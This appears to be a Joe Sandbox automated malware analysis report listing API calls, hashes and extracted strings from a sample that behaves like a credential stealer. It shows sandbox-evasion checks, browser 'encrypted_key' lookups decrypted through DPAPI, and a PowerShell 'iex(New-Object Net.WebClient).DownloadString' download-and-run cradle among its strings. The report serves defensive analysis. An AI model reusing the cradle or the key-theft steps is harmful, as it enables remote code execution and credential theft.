                                            • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022E9BE3
                                            • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022E9BFC
                                            • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022E9C14
                                            • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022E9C2C
                                            • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022E9C45
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022D1437: ExitProcess.KERNEL32 ref: 022D1478
                                            • Part of subcall function 022D13C7: GetSystemInfo.KERNEL32(?), ref: 022D13D1
                                            • Part of subcall function 022D13C7: ExitProcess.KERNEL32 ref: 022D13E5
                                            • Part of subcall function 022D1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 022D1392
                                            • Part of subcall function 022D1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 022D1399
                                            • Part of subcall function 022D1377: ExitProcess.KERNEL32 ref: 022D13AA
                                            • Part of subcall function 022D1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022D14A5
                                            • Part of subcall function 022D1487: __aulldiv.LIBCMT ref: 022D14BF
                                            • Part of subcall function 022D1487: __aulldiv.LIBCMT ref: 022D14CD
                                            • Part of subcall function 022D1487: ExitProcess.KERNEL32 ref: 022D14FB
                                            • Part of subcall function 022E69D7: GetUserDefaultLangID.KERNEL32 ref: 022E69DB
                                            • Part of subcall function 022D13F7: ExitProcess.KERNEL32 ref: 022D142D
                                            • Part of subcall function 022E7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,022D141E), ref: 022E7AE7
                                            • Part of subcall function 022E7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 022E7AEE
                                            • Part of subcall function 022E7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 022E7B06
                                            • Part of subcall function 022E7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E7B77
                                            • Part of subcall function 022E7B47: RtlAllocateHeap.NTDLL(00000000), ref: 022E7B7E
                                            • Part of subcall function 022E7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 022E7B96
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D31
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022E6D4F
                                          • CloseHandle.KERNEL32(00000000), ref: 022E6D60
                                          • Sleep.KERNEL32(00001770), ref: 022E6D6B
                                          • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D81
                                          • ExitProcess.KERNEL32 ref: 022E6D89
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                          • String ID:
                                          • API String ID: 2525456742-0
                                          • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                          • Instruction ID: 6b802aba971a2a858e44c7199d19aa7b74a3148ea55deb98e58b0bce65c7f0ec
                                          • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                          • Instruction Fuzzy Hash: D7314671A60308ABDF04FBF0DC54BFD737AAF64300F905518A103A6298EF746A44DE61
                                          APIs
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                          • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                          • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                          • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                          • String ID:
                                          • API String ID: 2311089104-0
                                          • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                          • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                          • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                          • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                          APIs
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
                                          • ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                          • LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                          • CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                          • String ID:
                                          • API String ID: 2311089104-0
                                          • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                          • Instruction ID: 57d0184eccfd883a9fbe46d84bccd4f6d7df6eced763943a331e98d88b1d335f
                                          • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                          • Instruction Fuzzy Hash: AE3114B8A10209EFDB14CFD4C884BAE77F5FB48304F108158F915AB294D778AA81CFA1
                                          APIs
                                          • __getptd.LIBCMT ref: 0041C9EA
                                            • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                            • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                          • __amsg_exit.LIBCMT ref: 0041CA0A
                                          • __lock.LIBCMT ref: 0041CA1A
                                          • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                          • free.MSVCRT ref: 0041CA4A
                                          • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                          • String ID:
                                          • API String ID: 634100517-0
                                          • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                          • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                          • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                          • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                          APIs
                                          • __getptd.LIBCMT ref: 022ECC51
                                            • Part of subcall function 022EC206: __getptd_noexit.LIBCMT ref: 022EC209
                                            • Part of subcall function 022EC206: __amsg_exit.LIBCMT ref: 022EC216
                                          • __amsg_exit.LIBCMT ref: 022ECC71
                                          • __lock.LIBCMT ref: 022ECC81
                                          • InterlockedDecrement.KERNEL32(?), ref: 022ECC9E
                                          • free.MSVCRT ref: 022ECCB1
                                          • InterlockedIncrement.KERNEL32(0042B980), ref: 022ECCC9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                          • String ID:
                                          • API String ID: 634100517-0
                                          • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                          • Instruction ID: e28fbded98c7fd5dae72b16c23fdeb074884fefa5ce1b9942b7ceca60593d41b
                                          • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                          • Instruction Fuzzy Hash: BF01D232A21B26ABCF21ABE5944475D7760FF04714FC04127EC16672A8CB746881FFE9
                                          APIs
                                          • strlen.MSVCRT ref: 00416F1F
                                          • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                            • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                            • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                          • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                          • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                            • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strlen$MemoryProcessQueryReadVirtual
                                          • String ID: @
                                          • API String ID: 2950663791-2766056989
                                          • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                          • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                          • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                          • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                          APIs
                                          • strlen.MSVCRT ref: 022E7186
                                          • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,022E7401,00000000,00420BA8,00000000,00000000), ref: 022E71B4
                                            • Part of subcall function 022E6E37: strlen.MSVCRT ref: 022E6E48
                                            • Part of subcall function 022E6E37: strlen.MSVCRT ref: 022E6E6C
                                          • VirtualQueryEx.KERNEL32(022E7574,00000000,?,0000001C), ref: 022E71F9
                                          • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022E7401), ref: 022E731A
                                            • Part of subcall function 022E7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 022E705F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strlen$MemoryProcessQueryReadVirtual
                                          • String ID: @
                                          • API String ID: 2950663791-2766056989
                                          • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                          • Instruction ID: 1a5eb8b31e6e47d254f1ef9652c013fac4ea2837b66191479c99be81b83a4cc8
                                          • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                          • Instruction Fuzzy Hash: B151F8B1D1010AEBDF04CFD8D991AEFB7B6BF88300F048519F916A7244D774AA01DBA1
                                          APIs
                                          • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: *n@$*n@
                                          • API String ID: 1029625771-193229609
                                          • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                          • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                          • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                          • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                          APIs
                                          • lstrcat.KERNEL32(?,0064A30C), ref: 022E4A42
                                            • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E4A68
                                          • lstrcat.KERNEL32(?,?), ref: 022E4A87
                                          • lstrcat.KERNEL32(?,?), ref: 022E4A9B
                                          • lstrcat.KERNEL32(?,0064A284), ref: 022E4AAE
                                          • lstrcat.KERNEL32(?,?), ref: 022E4AC2
                                          • lstrcat.KERNEL32(?,0064A2C8), ref: 022E4AD6
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022E8FF7: GetFileAttributesA.KERNEL32(00000000,?,022D1DBB,?,?,0042565C,?,?,00420E1F), ref: 022E9006
                                            • Part of subcall function 022E47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022E47E7
                                            • Part of subcall function 022E47D7: RtlAllocateHeap.NTDLL(00000000), ref: 022E47EE
                                            • Part of subcall function 022E47D7: wsprintfA.USER32 ref: 022E480D
                                            • Part of subcall function 022E47D7: FindFirstFileA.KERNEL32(?,?), ref: 022E4824
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                          • String ID:
                                          • API String ID: 2540262943-0
                                          • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                          • Instruction ID: f2d4d514add2d969cebb377d1db9d96e4ed18de71ae1ecd4539420b9d826a375
                                          • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                          • Instruction Fuzzy Hash: CB3192B69503086BDF10FBF0CC84EED737AAB58700F8045C9B24696094EEB49789DF95
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                          Strings
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                          • ')", xrefs: 00412CB3
                                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                          • <, xrefs: 00412D39
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          • API String ID: 3031569214-898575020
                                          • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                          • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                          • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                          • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022D14A5
                                          • __aulldiv.LIBCMT ref: 022D14BF
                                          • __aulldiv.LIBCMT ref: 022D14CD
                                          • ExitProcess.KERNEL32 ref: 022D14FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                          • String ID: @
                                          • API String ID: 3404098578-2766056989
                                          • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                          • Instruction ID: 06d6101d926c31066536a6e1e8b75f2bc983d3fcd1a147eb1f670d67b98c375a
                                          • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                          • Instruction Fuzzy Hash: 0E011DB0961308BAEF10DBD0CC89B9DBB7DAB00B05F609448E70A776C8D7B4A5958B55
                                          APIs
                                          • memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                            • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                            • Part of subcall function 022E0CC7: memset.MSVCRT ref: 022E0E83
                                            • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00000000), ref: 022E0E9C
                                            • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 022E0EAE
                                            • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00000000), ref: 022E0EC4
                                            • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00420D80), ref: 022E0ED6
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                          • memcmp.MSVCRT(?,00421114,00000003), ref: 022DA116
                                          • memset.MSVCRT ref: 022DA14F
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 022DA1A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                          • String ID: @
                                          • API String ID: 1977917189-2766056989
                                          • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                          • Instruction ID: 1033d2c68e6845531657e77deb6a04fad2dd76ddb81437c13d48f650b9555aab
                                          • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                          • Instruction Fuzzy Hash: 05615C30A203489BDF24EFE4CD95FED7776AF54304F408118E90A5B698DBB46A05CF51
                                          APIs
                                          • strtok_s.MSVCRT ref: 00410DB8
                                          • strtok_s.MSVCRT ref: 00410EFD
                                            • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00946070,?,0042110C,?,00000000), ref: 0041A82B
                                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strtok_s$lstrcpylstrlen
                                          • String ID:
                                          • API String ID: 348468850-0
                                          • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                          • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                          • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                          • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                            • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                            • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                            • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                          • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                            • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                            • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                            • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                            • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                          • String ID: $"encrypted_key":"$DPAPI
                                          • API String ID: 3731072634-738592651
                                          • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                          • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
